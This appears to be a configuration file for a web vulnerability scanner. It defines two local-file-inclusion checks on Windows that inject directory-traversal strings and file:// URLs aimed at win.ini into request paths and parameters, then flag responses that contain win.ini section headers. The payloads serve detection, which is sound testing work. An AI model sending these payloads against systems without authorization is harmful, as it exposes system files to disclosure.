# This configuration holds security checks for file disclosure
# vulnerabilities on Windows systems.
#
security_test <
  name: "directory traversal"
  issue_type: FILE_INCLUSION_LOCAL

  generator_rule <
    method: APPEND_TO_VALUE
    method: SET_VALUE
    method: PREFIX_VALUE
    encoding: NONE
    encoding: URL
    encoding: HTML

    target <
      type: PATH_ELEMENTS
      last_field_only: true
    >
    target <
      type: URL_PARAMS
    >
    target <
      type: BODY_PARAMS
    >

    payload <
      type: STRING
      arg: "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini"
      arg: "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini%00"
      arg: "...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\Windows\\win.ini"
      arg: "...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\.\\...\\Windows\\win.ini%00"
      arg: "../../../../../../../../../../../../../../Windows\\win.ini"
      arg: "../../../../../../../../../../../../../../Windows\\win.ini%00"
    >
  >

  matching_rule <
    condition <
      target: RESPONSE_BODY
      match <
        method: CONTAINS
        value: "[fonts]"
      >
      match <
        method: CONTAINS
        value: "[extensions]"
      >
      match <
        method: CONTAINS
        value: "[Mail]"
      >
    >
  >

  allow_serial_evaluation: true
  advisory <
    severity: HIGH
    title: "A directory traversal vulnerability was detected."
    description: ""
    recommendation: ""
  >
>

security_test <
  name: "URL file disclosure"
  issue_type: FILE_INCLUSION_LOCAL

  generator_rule <
    method: SET_VALUE
    method: PREFIX_VALUE
    encoding: NONE
    encoding: URL
    encoding: HTML

    target <
      type: URL_PARAMS
    >
    target <
      type: BODY_PARAMS
    >

    payload <
      type: STRING
      arg: "file:///c:/Windows/win.ini"
      arg: "file:///c:/Windows/win.ini%00"
      arg: "file:///c:/Windows/win.ini?"
    >
  >

  matching_rule <
    condition <
      target: RESPONSE_BODY
      match <
        method: CONTAINS
        value: "[fonts]"
      >
      match <
        method: CONTAINS
        value: "[extensions]"
      >
      match <
        method: CONTAINS
        value: "[Mail]"
      >
    >
  >

  allow_serial_evaluation: true
  advisory <
    severity: HIGH
    title: "System files can be disclosed using the file:// URL scheme."
    description: ""
    recommendation: ""
  >
>
